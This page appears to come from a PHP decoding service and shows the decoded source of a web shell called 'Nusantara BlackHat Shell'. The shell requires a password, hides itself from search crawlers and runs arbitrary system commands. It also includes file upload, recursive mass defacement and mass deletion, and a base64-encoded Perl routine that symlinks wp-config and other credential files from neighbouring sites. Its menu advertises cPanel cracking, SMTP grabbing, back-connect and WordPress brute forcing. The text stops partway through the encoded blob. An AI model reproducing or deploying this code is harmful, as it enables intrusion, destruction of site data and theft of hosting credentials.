Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php session_start(); error_reporting(0); set_time_limit(0); $auth_pass = "f55fc9719a..

Decoded Output download

@set_magic_quotes_runtime(0);
@clearstatcache();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
 
$color = "#00ff00";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'UTF-8';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
 
function login_shell() {
?>
<html>
<head>
<title>Nusantara BlackHat Shell</title>
<link href='http://img.deusm.com/darkreading/bh-asia-facebook-profile.png' rel='icon' type='image/x-icon'/>

<style type="text/css">
html {
    margin: 20px auto;
    background: #000000;
    color: lime;
    text-align: center;
}
header {
    color: Dimgray;
    margin: 10px auto;
}
input[type=password] {
    width: 250px;
    height: 25px;
    color: Dimgray;
    background: #000000;
    border: 1px dotted lime;
    padding: 5px;
    margin-left: 20px;
    text-align: center;
}
</style>
</head>
<body>
<center> 
<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">

<style type="text/css">

</style>
<br>
      	  <p><img style="width:290px;" src="http://img.deusm.com/darkreading/bh-asia-facebook-profile.png" border="0"></p>
   <br>      <font color="white" face="iceland" size="8"><b>Nusantara<font color="Dimgray"> BlackHat</font></b><br>
<form method="post">
<input type="password" name="pass">
</form>
<?php
exit;
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
    if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        login_shell();
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
    @ob_clean();
    $file = $_GET['file'];
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}
?>
<html>
<head>
<title>Nusantara BlackHat Shell</title>
<link href='http://img.deusm.com/darkreading/bh-asia-facebook-profile.png' rel='icon' type='image/x-icon'/>
<meta name='author' content='Nusantara BlackHat'>
<meta charset="UTF-8">
<style type='text/css'>
@import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
html {
    background: #000000;
    color: #ffffff;
    font-family: 'Share Tech Mono';
	font-size: 12px;
	width: 100%;
}
li {
	display: inline;
	margin: 1px;
	padding: 1px;
}

 #menu{
	background:#111111;
	margin:9px 3px 4px 2px;
}
#menu a{
	padding:4px 19px;
	margin:0;
	background:#222222;
	text-decoration:none;
	letter-spacing:2px;
	-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;

}
#menu a:hover{
	background:#191919;
	border-bottom:1px solid #333333;
	border-top:1px solid #333333;
}
.explore tr:hover{background:#181818}
table tr:first-child{	
	background: #191919;
	text-align: center;
	color: white;
}
table, th, td {
	border-collapse:collapse;
	font-family: Tahoma, Geneva, sans-serif;
	background: transparent;
	font-family: 'Share Tech Mono';
	font-size: 13px;
}
.table_home, .th_home, .td_home {
	border: 1px solid #191919;
}
th {
	padding: 10px;
}
a {
	color: #ffffff;
	text-decoration: none;
}
a:hover {
	color: dimgray;
	text-decoration: underline;
}
b {
	color: dimgray;
}
input[type=text], input[type=password],input[type=submit] {
	background: transparent; 
	color: #ffffff; 
	border: 1px solid #ffffff; 
	margin: 5px auto;
	padding-left: 5px;
	font-family: 'Share Tech Mono';
	font-size: 13px;
}
input[type=submit] {
	background: #191919; 
	color: #ffffff; 
	border: 1px solid #ffffff; 
	margin: 5px auto;
	padding-left: 5px;
	font-family: 'Share Tech Mono';
	font-size: 13px;
	cursor:pointer;
}
textarea {
	border: 1px solid #ffffff;
	width: 100%;
	height: 400px;
	padding-left: 5px;
	margin: 10px auto;
	resize: none;
	background: transparent;
	color: #ffffff;
	font-family: 'Share Tech Mono';
	font-size: 13px;
}
select {
	width: 152px;
	background: #000000; 
	color: dimgray; 
	border: 1px solid #ffffff; 
	margin: 5px auto;
	padding-left: 5px;
	font-family: 'Share Tech Mono';
	font-size: 13px;
}
option:hover {
	background: dimgray;
	color: #000000;
}
.mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
.cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
.infoweb {
	border-right: 1px solid #00FFFF;
}

</style>
</head>
<?php
###############################################################################

###############################################################################
function w($dir,$perm) {
    if(!is_writable($dir)) {
        return "<font color=red>".$perm."</font>";
    } else {
        return "<font color=lime>".$perm."</font>";
    }
}
function r($dir,$perm) {
    if(!is_readable($dir)) {
        return "<font color=red>".$perm."</font>";
    } else {
        return "<font color=lime>".$perm."</font>";
    }
}
function exe($cmd) {
    if(function_exists('system')) {        
        @ob_start();       
        @system($cmd);     
        $buff = @ob_get_contents();        
        @ob_end_clean();       
        return $buff;  
    } elseif(function_exists('exec')) {        
        @exec($cmd,$results);      
        $buff = "";        
        foreach($results as $result) {         
            $buff .= $result;      
        } return $buff;    
    } elseif(function_exists('passthru')) {        
        @ob_start();       
        @passthru($cmd);       
        $buff = @ob_get_contents();        
        @ob_end_clean();       
        return $buff;  
    } elseif(function_exists('shell_exec')) {      
        $buff = @shell_exec($cmd);     
        return $buff;  
    }
}
function perms($file){
    $perms = fileperms($file);
    if (($perms & 0xC000) == 0xC000) {
    // Socket
    $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) {
    // Symbolic Link
    $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
    // Regular
    $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
    // Block special
    $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
    // Directory
    $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
    // Character special
    $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
    // FIFO pipe
    $info = 'p';
    } else {
    // Unknown
    $info = 'u';
    }
        // Owner
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ?
    (($perms & 0x0800) ? 's' : 'x' ) :
    (($perms & 0x0800) ? 'S' : '-'));
    // Group
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ?
    (($perms & 0x0400) ? 's' : 'x' ) :
    (($perms & 0x0400) ? 'S' : '-'));
    // World
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ?
    (($perms & 0x0200) ? 't' : 'x' ) :
    (($perms & 0x0200) ? 'T' : '-'));
    return $info;
}
function hdd($s) {
    if($s >= 1073741824)
    return sprintf('%1.2f',$s / 1073741824 ).' GB';
    elseif($s >= 1048576)
    return sprintf('%1.2f',$s / 1048576 ) .' MB';
    elseif($s >= 1024)
    return sprintf('%1.2f',$s / 1024 ) .' KB';
    else
    return $s .' B';
}
function ambilKata($param, $kata1, $kata2){
    if(strpos($param, $kata1) === FALSE) return FALSE;
    if(strpos($param, $kata2) === FALSE) return FALSE;
    $start = strpos($param, $kata1) + strlen($kata1);
    $end = strpos($param, $kata2, $start);
    $return = substr($param, $start, $end - $start);
    return $return;
}
function getsource($url) {
    $curl = curl_init($url);
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
            curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    $content = curl_exec($curl);
            curl_close($curl);
    return $content;
}
function bing($dork) {
    $npage = 1;
    $npages = 30000;
    $allLinks = array();
    $lll = array();
    while($npage <= $npages) {
        $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
        if($x) {
            preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
            foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
            $npage = $npage + 10;
            if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
        } else break;
    }
    $URLs = array();
    foreach($allLinks as $url){
        $exp = explode("/", $url);
        $URLs[] = $exp[2];
    }
    $array = array_filter($URLs);
    $array = array_unique($array);
    $sss = count(array_unique($array));
    foreach($array as $domain) {
        echo $domain."
";
    }
}
function reverse($url) {
    $ch = curl_init("http://domains.yougetsignal.com/domains.php");
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
          curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
          curl_setopt($ch, CURLOPT_HEADER, 0);
          curl_setopt($ch, CURLOPT_POST, 1);
    $resp = curl_exec($ch);
    $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
    $array = explode(",,", $resp);
    unset($array[0]);
    foreach($array as $lnk) {
        $lnk = "http://$lnk";
        $lnk = str_replace(",", "", $lnk);
        echo $lnk."
";
        ob_flush();
        flush();
    }
        curl_close($ch);
}
if(get_magic_quotes_gpc()) {
    function idx_ss($array) {
        return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
    }
    $_POST = idx_ss($_POST);
    $_COOKIE = idx_ss($_COOKIE);
}
 
if(isset($_GET['dir'])) {
    $dir = $_GET['dir'];
    chdir($dir);
} else {
    $dir = getcwd();
}
$kernel = php_uname();
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$dir = str_replace("\","/",$dir);
$scdir = explode("/", $dir);
$freespace = hdd(disk_free_space("/"));
$total = hdd(disk_total_space("/"));
$used = $total - $freespace;
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
if(!function_exists('posix_getegid')) {
    $user = @get_current_user();
    $uid = @getmyuid();
    $gid = @getmygid();
    $group = "?";
} else {
    $uid = @posix_getpwuid(posix_geteuid());
    $gid = @posix_getgrgid(posix_getegid());
    $user = $uid['name'];
    $uid = $uid['uid'];
    $group = $gid['name'];
    $gid = $gid['gid'];
}
echo "System: <font color=lime>".$kernel."</font><br>";
echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
echo "Safe Mode: $sm<br>";
echo "Disable Functions: $show_ds<br>";
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
echo "<hr>";
echo "<center>";
echo "<br><link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'><font face='iceland'size='7'>Nusantara_</font><font face='iceland' size='7' color='Dimgray'>BlackHat</font>";
echo "<ul><font face='iceland' size='3.8' color='dimgray'>";

echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?'>Home</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=upload'>Upload</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=cmd'>Command</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=mass_deface'>Mass Deface</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=mass_delete'>Mass Delete</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=config'>Config</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=jumping'>Jumping</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=cpanel'>CPanel Crack</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=smtp'>SMTP Grabber</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=cgi'>CGI Telnet</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=network'>network</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=adminer'>Adminer</a> </li>";
echo "<p>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=fake_root'>Fake Root</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> </li>";
echo "<p>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=defacerid'>DefacerID</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=csrf'>CSRF Online</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=backconnect'>Back Connect</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=wpbf'>WordPress Brute</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=hashid'>Hash Identification</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=symlink'>Symlink</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=passwbypass'>Bypass Etc/Passw</a> </li>";
echo "<li> <a style='border:2px solid #0F6516;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=dbdump'>DB Dump</a> </li>";
echo "<li> <a style='border:2px solid darkred;width:80px;padding:0px 8px 0px 8px;' href='?logout=true'>Logout</a> </li><p>";

echo "<font size'5'>Current DIR: ";
foreach($scdir as $c_dir => $cdir) {   
    echo "<a href='?dir=";
    for($i = 0; $i <= $c_dir; $i++) {
        echo $scdir[$i];
        if($i != $c_dir) {
        echo "/";
        }
    }
    echo "'>$cdir</a>/";
}
echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
echo "</font></ul>";
echo "</center>";
echo "<hr>";
if($_GET['logout'] == true) {
    unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
    echo "<script>window.location='?';</script>";
} elseif($_GET['do'] == 'upload') {
    echo "<center>";
    if($_POST['upload']) {
        if($_POST['tipe_upload'] == 'biasa') {
            if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
                $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
            } else {
                $act = "<font color=red>failed to upload file</font>";
            }
        } else {
            $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
            $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
            if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
                if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
                    $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
                } else {
                    $act = "<font color=red>failed to upload file</font>";
                }
            } else {
                $act = "<font color=red>failed to upload file</font>";
            }
        }
    }
    echo "Upload File:
    <form method='post' enctype='multipart/form-data'>
    <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
    <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
    <input type='file' name='ix_file'>
    <input type='submit' value='upload' name='upload'>
    </form>";
    echo $act;
    echo "</center>";
} elseif($_GET['do'] == 'cmd') {
    echo "<form method='post'>
    <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
    <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
    </form>";
    if($_POST['do_cmd']) {
        echo "<pre>".exe($_POST['cmd'])."</pre>";
    }
} elseif($_GET['do'] == 'mass_deface') {
    function sabun_massal($dir,$namafile,$isi_script) {
        if(is_writable($dir)) {
            $dira = scandir($dir);
            foreach($dira as $dirb) {
                $dirc = "$dir/$dirb";
                $lokasi = $dirc.'/'.$namafile;
                if($dirb === '.') {
                    file_put_contents($lokasi, $isi_script);
                } elseif($dirb === '..') {
                    file_put_contents($lokasi, $isi_script);
                } else {
                    if(is_dir($dirc)) {
                        if(is_writable($dirc)) {
                            echo "[<font color=lime>DONE</font>] $lokasi<br>";
                            file_put_contents($lokasi, $isi_script);
                            $idx = sabun_massal($dirc,$namafile,$isi_script);
                        }
                    }
                }
            }
        }
    }
    function sabun_biasa($dir,$namafile,$isi_script) {
        if(is_writable($dir)) {
            $dira = scandir($dir);
            foreach($dira as $dirb) {
                $dirc = "$dir/$dirb";
                $lokasi = $dirc.'/'.$namafile;
                if($dirb === '.') {
                    file_put_contents($lokasi, $isi_script);
                } elseif($dirb === '..') {
                    file_put_contents($lokasi, $isi_script);
                } else {
                    if(is_dir($dirc)) {
                        if(is_writable($dirc)) {
                            echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
                            file_put_contents($lokasi, $isi_script);
                        }
                    }
                }
            }
        }
    }
    if($_POST['start']) {
        if($_POST['tipe_sabun'] == 'mahal') {
            echo "<div style='margin: 5px auto; padding: 5px'>";
            sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
            echo "</div>";
        } elseif($_POST['tipe_sabun'] == 'murah') {
            echo "<div style='margin: 5px auto; padding: 5px'>";
            sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
            echo "</div>";
        }
    } else {
    echo "<center>";
    echo "<form method='post'>
    <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
    <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
    <font style='text-decoration: underline;'>Folder:</font><br>
    <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
    <font style='text-decoration: underline;'>Filename:</font><br>
    <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
    <font style='text-decoration: underline;'>Index File:</font><br>
    <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Nusantara BlackHat</textarea><br>
    <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
    </form></center>";
    }
} elseif($_GET['do'] == 'mass_delete') {
    function hapus_massal($dir,$namafile) {
        if(is_writable($dir)) {
            $dira = scandir($dir);
            foreach($dira as $dirb) {
                $dirc = "$dir/$dirb";
                $lokasi = $dirc.'/'.$namafile;
                if($dirb === '.') {
                    if(file_exists("$dir/$namafile")) {
                        unlink("$dir/$namafile");
                    }
                } elseif($dirb === '..') {
                    if(file_exists("".dirname($dir)."/$namafile")) {
                        unlink("".dirname($dir)."/$namafile");
                    }
                } else {
                    if(is_dir($dirc)) {
                        if(is_writable($dirc)) {
                            if(file_exists($lokasi)) {
                                echo "[<font color=lime>DELETED</font>] $lokasi<br>";
                                unlink($lokasi);
                                $idx = hapus_massal($dirc,$namafile);
                            }
                        }
                    }
                }
            }
        }
    }
    if($_POST['start']) {
        echo "<div style='margin: 5px auto; padding: 5px'>";
        hapus_massal($_POST['d_dir'], $_POST['d_file']);
        echo "</div>";
    } else {
    echo "<center>";
    echo "<form method='post'>
    <font style='text-decoration: underline;'>Folder:</font><br>
    <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
    <font style='text-decoration: underline;'>Filename:</font><br>
    <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
    <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
    </form></center>";
    }
} elseif($_GET['do'] == 'config') {
    $idx = mkdir("nb_config", 0777);
    $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGInRequire NonenSatisfy AnynAddType application/x-httpd-cgi .cinnAddHandler cgi-script .cinnAddHandler cgi-script .cin";
    $htc = fopen("nb_config/.htaccess","w");
    fwrite($htc, $isi_htc);
    fclose($htc);
    if(preg_match("/vhosts|vhost/", $dir)) {
        $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
        $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3